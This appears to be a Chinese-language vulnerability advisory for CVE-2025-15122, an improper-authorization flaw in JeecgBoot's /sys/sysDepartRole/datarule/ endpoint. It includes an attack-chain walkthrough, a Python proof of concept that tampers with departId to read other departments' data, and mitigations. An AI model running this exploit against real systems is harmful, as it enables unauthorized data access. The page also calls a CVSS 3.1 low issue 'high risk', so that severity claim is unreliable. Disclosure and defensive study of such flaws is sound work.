CVE-2025-15122: JeecgBoot 3.9.0及之前版本loadDatarule函数不当授权漏洞

漏洞信息

漏洞编号

CVE-2025-15122

漏洞类型

不当授权

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JeecgBoot

漏洞概述

CVE-2025-15122是JeecgBoot企业级低代码平台中的一个高风险安全漏洞。该漏洞存在于/sys/sysDepartRole/datarule/路径下的loadDatarule函数中，攻击者通过对departId或roleId参数进行恶意操作，可以绕过正常的权限检查机制，获取未授权的数据访问权限。由于该漏洞需要低权限用户即可发起攻击，且可以通过网络远程利用，虽然攻击复杂度较高且利用难度较大，但已被公开披露并可能被恶意利用。JeecgBoot作为一款广泛应用于企业级应用的低代码开发框架，其安全性至关重要。该漏洞影响范围覆盖3.9.0及之前所有版本，厂商在收到通知后未做出任何回应和修复。

技术细节

该漏洞属于典型的业务逻辑层面的权限控制缺陷。在JeecgBoot的/sys/sysDepartRole/datarule/接口中，loadDatarule函数负责加载数据权限规则。漏洞的根本原因在于函数对departId和roleId参数的验证不充分，允许低权限用户通过构造特殊的参数值来访问本应受保护的资源。具体来说，攻击者可以通过修改请求中的departId或roleId参数，绕过基于角色的访问控制(RBAC)检查，从而获取其他部门或角色的数据权限。由于CVSS评分中机密性影响为低(C:L)，完整性影响为无(I:N)，可用性影响为无(A:N)，因此该漏洞主要威胁是敏感数据的未授权访问，而非系统完整性或可用性破坏。攻击者需要具备一定的技术能力来构造有效的攻击请求。

攻击链分析

STEP 1

步骤1

攻击者获取JeecgBoot系统的低权限用户账户

STEP 2

步骤2

访问/sys/sysDepartRole/datarule/端点，识别loadDatarule函数

STEP 3

步骤3

分析正常的departId和roleId参数值，了解系统的数据权限分配机制

STEP 4

步骤4

构造恶意请求，将departId或roleId修改为目标部门或角色的ID值

STEP 5

步骤5

发送构造的请求，由于函数缺乏充分的参数验证，绕过权限检查

STEP 6

步骤6

成功获取其他部门或角色的敏感数据，造成数据泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-15122 PoC - JeecgBoot Unauthorized Data Access
# Target: JeecgBoot <= 3.9.0
# Endpoint: /sys/sysDepartRole/datarule/
# Vulnerability: Improper authorization via departId/roleId manipulation

TARGET_URL = "http://target-server.com"
VULN_ENDPOINT = "/sys/sysDepartRole/datarule/"

def exploit_cve_2025_15122():
    """
    Exploit for CVE-2025-15122
    Attempts to access unauthorized data by manipulating departId/roleId parameters
    """
    # Normal request with low-privilege user credentials
    normal_headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <low_privilege_token>"
    }
    
    # Original request (should be restricted)
    normal_payload = {
        "departId": "1001",
        "roleId": "2001"
    }
    
    print("[*] Sending normal request...")
    response = requests.post(
        f"{TARGET_URL}{VULN_ENDPOINT}",
        json=normal_payload,
        headers=normal_headers
    )
    
    # Exploit: Manipulate departId to access other department's data
    exploit_payload = {
        "departId": "9999",  # Try to access different department
        "roleId": "2001"
    }
    
    print("[*] Sending exploit request with manipulated departId...")
    exploit_response = requests.post(
        f"{TARGET_URL}{VULN_ENDPOINT}",
        json=exploit_payload,
        headers=normal_headers
    )
    
    if exploit_response.status_code == 200:
        print("[+] Exploit successful! Unauthorized data access achieved.")
        print(f"[+] Response: {exploit_response.text}")
    else:
        print("[-] Exploit failed or target not vulnerable.")

if __name__ == "__main__":
    exploit_cve_2025_15122()

影响范围

JeecgBoot < 3.9.0

JeecgBoot 3.9.0

JeecgBoot 所有3.x版本

防御指南

临时缓解措施

由于厂商尚未提供官方修复补丁，建议采取以下临时缓解措施：1) 在Web应用防火墙(WAF)上配置规则，限制对/sys/sysDepartRole/datarule/端点的访问；2) 实施严格的会话管理和身份验证机制；3) 监控和限制低权限用户对敏感API的访问频率；4) 对departId和roleId参数进行严格的输入验证和类型检查；5) 考虑暂时禁用受影响的功能模块，待官方发布修复版本后再重新启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15122
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15122
3 Details https://www.cvedetails.com/cve/CVE-2025-15122/
4 VulDB https://vuldb.com/cve/CVE-2025-15122
5 Link https://github.com/Hwwg/cve/issues/35
6 Link https://vuldb.com/?ctiid.338500
7 Link https://vuldb.com/?id.338500
8 Link https://vuldb.com/?submit.711774